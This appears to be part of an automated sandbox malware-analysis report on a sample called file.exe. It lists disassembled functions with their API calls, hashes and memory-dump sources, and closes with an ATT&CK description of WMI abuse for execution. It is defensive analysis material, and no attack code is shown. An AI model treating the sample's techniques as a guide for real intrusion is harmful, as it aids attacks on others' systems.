Opcode Fuzzy Hash: b19d64e817f1f92d8885cc9d67c743be971c621272890a1c77e64e1c7893f405
Instruction Fuzzy Hash: 8631823AA04301DFE760AB35D844BC6B3E8EF44358F214529E06DD7AB4DF70EA449B61

Function 6CD998D3 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CD998E9

Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B

_free.LIBCMT ref: 6CD998F5
_free.LIBCMT ref: 6CD99900
_free.LIBCMT ref: 6CD9990B
_free.LIBCMT ref: 6CD99916
_free.LIBCMT ref: 6CD99921
_free.LIBCMT ref: 6CD9992C
_free.LIBCMT ref: 6CD99937
_free.LIBCMT ref: 6CD99942
_free.LIBCMT ref: 6CD99950

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 41e71d546974486af599f63b9b52efa044ba31a0c15146488be47c050284ca50
Instruction ID: c6fb252a1a7ab5135c0390d95f507f430779e751d1a37ae2becf2c335fa10551
Opcode Fuzzy Hash: 41e71d546974486af599f63b9b52efa044ba31a0c15146488be47c050284ca50
Instruction Fuzzy Hash: A3219A7AD04108AFCB51DF94C880DDD7BB9BF08244F014166F51D9B634DB71DA48DB91

Function 6CD97EB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6CD97EE7
___except_validate_context_record.LIBVCRUNTIME ref: 6CD97EEF
_ValidateLocalCookies.LIBCMT ref: 6CD97F78
__IsNonwritableInCurrentImage.LIBCMT ref: 6CD97FA3
_ValidateLocalCookies.LIBCMT ref: 6CD97FF8

Strings

csm, xrefs: 6CD97F8D

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9ffbde42296f5c2e848508862d22d11d02c581744c99bb32ecc054f236cd1345
Instruction ID: 6ffc3f548361857d12cbec9a6b8648419c24855c492afa743d76e51cbc90551f
Opcode Fuzzy Hash: 9ffbde42296f5c2e848508862d22d11d02c581744c99bb32ecc054f236cd1345
Instruction Fuzzy Hash: 7C41A538A01205EFCF00DF69C880ADEBBF5BF45318F158195E819ABB61D731DA15CBA1

Function 6CD9B53A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 6CD9B591
ext-ms-, xrefs: 6CD9B5A5

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: a43848fdfd37e9ce92c8bcc600ff096ac3d1e8cd8594ee4d62e4ff5bca0f9e4b
Instruction ID: 9d774ccc00201759b45ad1a372698ee24dd10d282b88311813c33eba17ff83e2
Opcode Fuzzy Hash: a43848fdfd37e9ce92c8bcc600ff096ac3d1e8cd8594ee4d62e4ff5bca0f9e4b
Instruction Fuzzy Hash: BC210A79A05221FBEB719B66DC44B5E77689F427A8F230614ED15E7AE0D630DD00C6E0

Function 6CD9E7C6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CD9E78E: _free.LIBCMT ref: 6CD9E7B3

_free.LIBCMT ref: 6CD9E814

Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B

_free.LIBCMT ref: 6CD9E81F
_free.LIBCMT ref: 6CD9E82A
_free.LIBCMT ref: 6CD9E87E
_free.LIBCMT ref: 6CD9E889
_free.LIBCMT ref: 6CD9E894
_free.LIBCMT ref: 6CD9E89F

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: 572a85e11e53aeaa1779578a448c3d1ad7b543a7f27a73484832d02c2c08a1b0
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: 1F118E36940B08AAD730BBB0CC85FCB779CAF04749F400815A29DA6EB5DB35B50897A2

Function 6CD9D8DF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CD9D927
__fassign.LIBCMT ref: 6CD9DB0C
__fassign.LIBCMT ref: 6CD9DB29
WriteFile.KERNEL32(?,6CD9C0C3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD9DB71
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD9DBB1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD9DC59

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b10a18c8f8af104c5f8be61c512340be4eae99a348d88bda58fd03a6b60e24eb
Instruction ID: 982cb5ad27573ca6678faf22c19f84bf5647db9114ef39c11dab1e7c22b69308
Opcode Fuzzy Hash: b10a18c8f8af104c5f8be61c512340be4eae99a348d88bda58fd03a6b60e24eb
Instruction Fuzzy Hash: E6C1BD79D042589FDB01CFA8C9809EDFBB5BF09308F28416AE865FB751D7319946CB60

Function 6CD98387 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CD98055,6CD97180,6CD96B99,?,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120,0000000C,6CD96ECA), ref: 6CD98395
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CD983A3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CD983BC
SetLastError.KERNEL32(00000000,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120,0000000C,6CD96ECA,?,00000001,?), ref: 6CD9840E

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9fe094788177b8e59421e6760e46dd896342a5fa9355be039864b5392f8f14d4
Instruction ID: f4fe107e993c04eadaaadf33a34ae7ac77f3c3093f6f60c804e0e448b2810b9c
Opcode Fuzzy Hash: 9fe094788177b8e59421e6760e46dd896342a5fa9355be039864b5392f8f14d4
Instruction Fuzzy Hash: 0B01B93A34D3219EB7001B75FC449873778EB06B79B25032FEA20855F0DF1284055154

Function 6CD9A87F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 6CD9A884

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: ee4201043f7e33e92d798f264ab67d0b0c4382dac7319eae871dba05561988c3
Instruction ID: ee5699815387403bd0a8eb1c39b7b4edfcf4afae8eb6b0792ea767fe5ae30f55
Opcode Fuzzy Hash: ee4201043f7e33e92d798f264ab67d0b0c4382dac7319eae871dba05561988c3
Instruction Fuzzy Hash: E821C27AA08216BF97109F668C8098BB7ECFF4137C7424614F96DD6A60E730EC0187B0

Function 6CD98503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CD985C4,00000000,?,00000001,00000000,?,6CD9863B,00000001,FlsFree,6CDA1D3C,FlsFree,00000000), ref: 6CD98593

Strings

api-ms-, xrefs: 6CD98553

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a8ecd39ccd36b0d0f3146cdc87eb5915bd6216397016160d3bedfe5793e218b2
Instruction ID: 269d508d0df9be37d3b75a82f4df0fbe68cffaf60c0f75504e13dccee3c6e301
Opcode Fuzzy Hash: a8ecd39ccd36b0d0f3146cdc87eb5915bd6216397016160d3bedfe5793e218b2
Instruction Fuzzy Hash: EC11063AF45221EBEF524BA9DC40B4D73B8AF02BA8F190212FA14F7694D730ED0486D5

Function 6CD98BBA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CD98B6C,?,?,6CD98B34,?,00000001,?), ref: 6CD98BCF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD98BE2
FreeLibrary.KERNEL32(00000000,?,?,6CD98B6C,?,?,6CD98B34,?,00000001,?), ref: 6CD98C05

Strings

mscoree.dll, xrefs: 6CD98BC8
CorExitProcess, xrefs: 6CD98BDA

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fd879563deba46bf6602d00e0e1a309511317395e422da52e1cb30a27db7f260
Instruction ID: 2d17a0dd472a38a14de08821c6290b51202470ca2d3eb13db3e245d6e9d83fe3
Opcode Fuzzy Hash: fd879563deba46bf6602d00e0e1a309511317395e422da52e1cb30a27db7f260
Instruction Fuzzy Hash: 70F01C39A02159FBEF02AB91DD19B9E7FBDEB01799F104061E501A2560CB34CE05EB94

Function 6CD9D1D7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CD9D25B
__alloca_probe_16.LIBCMT ref: 6CD9D321
__freea.LIBCMT ref: 6CD9D38D

Part of subcall function 6CD9C38C: HeapAlloc.KERNEL32(00000000,6CD9C0C3,6CD9C0C3,?,6CD9ADC3,00000220,?,6CD9C0C3,?,?,?,?,6CD9E1E1,00000001,?,?), ref: 6CD9C3BE

__freea.LIBCMT ref: 6CD9D396
__freea.LIBCMT ref: 6CD9D3B9

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 7dfcb07a0e430fe86c312669d596fd2188037bbbb8c06a158b19bf74e1141f77
Instruction ID: 191d9c0e68f6c8a3641ec0c7969741fb8a7cbb9f5194e1c63a3d64640fb810a5
Opcode Fuzzy Hash: 7dfcb07a0e430fe86c312669d596fd2188037bbbb8c06a158b19bf74e1141f77
Instruction Fuzzy Hash: 9451C57A601216FFEB118FA4CC40EAF37A9EF85759F210129FD14A7A60E734DC4187A1

Function 6CD9E725 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CD9E73D

Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B

_free.LIBCMT ref: 6CD9E74F
_free.LIBCMT ref: 6CD9E761
_free.LIBCMT ref: 6CD9E773
_free.LIBCMT ref: 6CD9E785

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 790578a4b36f69f7ad3ac1a487b0fd4e990a35cf2a6e921d548fd88b8a2a7bb7
Instruction ID: 7b95ee61527751c4bb260692bad9acbc161241ae728d262908b41052278573d9
Opcode Fuzzy Hash: 790578a4b36f69f7ad3ac1a487b0fd4e990a35cf2a6e921d548fd88b8a2a7bb7
Instruction Fuzzy Hash: 40F03C3AA01204D7CB60EB68F5C4D9673EDBB046287610805E13CD7E24CB30F98046E2

Function 6CD9A117 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CD9A739: _free.LIBCMT ref: 6CD9A747

Part of subcall function 6CD9B30D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CD9D383,?,00000000,00000000), ref: 6CD9B3B9

GetLastError.KERNEL32 ref: 6CD9A17F
__dosmaperr.LIBCMT ref: 6CD9A186
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CD9A1C5
__dosmaperr.LIBCMT ref: 6CD9A1CC

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 08d6756f9150a02b41ec4cba7fbb6b7fa5c1c62e821c5f5cc19586cefa33ea56
Instruction ID: 1e5332900111ff18a7a4c7f338ea17d52a07804c8d75adb84f9ae88621685acc
Opcode Fuzzy Hash: 08d6756f9150a02b41ec4cba7fbb6b7fa5c1c62e821c5f5cc19586cefa33ea56
Instruction Fuzzy Hash: 5521D67AA08205AF9B109F66CC90D5BB7BCEF013687148216F95DE7A60D730EC0087B0

Function 6CD99A17 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CD9DD27,?,00000001,6CD9C134,?,6CD9E1E1,00000001,?,?,?,6CD9C0C3,?,00000000), ref: 6CD99A1C
_free.LIBCMT ref: 6CD99A79
_free.LIBCMT ref: 6CD99AAF
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CD9E1E1,00000001,?,?,?,6CD9C0C3,?,00000000,00000000,6CDA6360,0000002C,6CD9C134), ref: 6CD99ABA

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3c239e2d73028531be3e5e937befa0878c9c8e92364a696350ce10c47ea727b0
Instruction ID: f550e0fbda52436907377aff75c913af2dd87d854954756654e964631047a8de
Opcode Fuzzy Hash: 3c239e2d73028531be3e5e937befa0878c9c8e92364a696350ce10c47ea727b0
Instruction Fuzzy Hash: 7411943E344211AEAB5177B59CC099A6769E7C266DB260624F23CC3AF0EE2188084121

Function 6CD99B6E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99B73
_free.LIBCMT ref: 6CD99BD0
_free.LIBCMT ref: 6CD99C06
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CD99FA8,6CD9A039,?,?,6CD9924C), ref: 6CD99C11

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: da1bf44b3b22ef97c97692028feab5abf8e6b8410313727ed964de8699753df8
Instruction ID: 3f3964253d30afeab8bd4b4f083bfe870ec9f00cccd75f7abf3f4ad2266d0a6b
Opcode Fuzzy Hash: da1bf44b3b22ef97c97692028feab5abf8e6b8410313727ed964de8699753df8
Instruction Fuzzy Hash: 5811863A354710AEEB5117799CC4EAB266DA7C367DB270724F63CD3AF0DF2588085121

Function 6CD9EF76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001), ref: 6CD9EF8D
GetLastError.KERNEL32(?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?,00000001,?,6CD9E202,6CD9C0C3), ref: 6CD9EF99

Part of subcall function 6CD9EF5F: CloseHandle.KERNEL32(FFFFFFFE,6CD9EFA9,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?,00000001), ref: 6CD9EF6F

___initconout.LIBCMT ref: 6CD9EFA9

Part of subcall function 6CD9EF21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD9EF50,6CD9E9BD,00000001,?,6CD9DCB6,?,?,00000001,?), ref: 6CD9EF34

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CD9E9D0,?,00000001,?,00000001,?,6CD9DCB6,?,?,00000001,?), ref: 6CD9EFBE

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a487e6ca1ca829f1ab754d3b5a5b970a6588050ea29c4861d32d7aa210ea6650
Instruction ID: 7482b37a63c375cb799cc6e0bef5c23fd7d09cc8d82874136a5ce8e39483fd0d
Opcode Fuzzy Hash: a487e6ca1ca829f1ab754d3b5a5b970a6588050ea29c4861d32d7aa210ea6650
Instruction Fuzzy Hash: A7F0F83A204555BBDF222FD2EC049C93FBAFB096A5B054011FB2995620C7329820ABD4

Function 6CD99344 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CD9934D

Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B

_free.LIBCMT ref: 6CD99360
_free.LIBCMT ref: 6CD99371
_free.LIBCMT ref: 6CD99382

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cc0b15710d30c0030a7a04b596f657346f59c52b13f5f746ffa71f0a2600dc9f
Instruction ID: 95934dd2a4c681c9a032cb1693034636ac15901bbe7d9deab3c38f2b7b9460b5
Opcode Fuzzy Hash: cc0b15710d30c0030a7a04b596f657346f59c52b13f5f746ffa71f0a2600dc9f
Instruction Fuzzy Hash: 9AE04F7BA001609AEF615F51F6105D57B39B70AA047028006F6384336AC7714252AF92

Function 6CD98C48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 6CD98C8B, 6CD98C92, 6CD98CC8

Memory Dump Source

Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_file.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: 27eed555264507c6a55140757d2f8ee7a69ed5a5e441e8c10c4475b4ffe35056
Instruction ID: 5b729e3fe7817a55f0e16f05d00d255b16dee532784c83906f00c09cd4199b37
Opcode Fuzzy Hash: 27eed555264507c6a55140757d2f8ee7a69ed5a5e441e8c10c4475b4ffe35056
Instruction Fuzzy Hash: 2241B1B5E05214AFDB118B99DC80AEEBBF8EB96B04F100057E414D7770D7718A45CB60

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
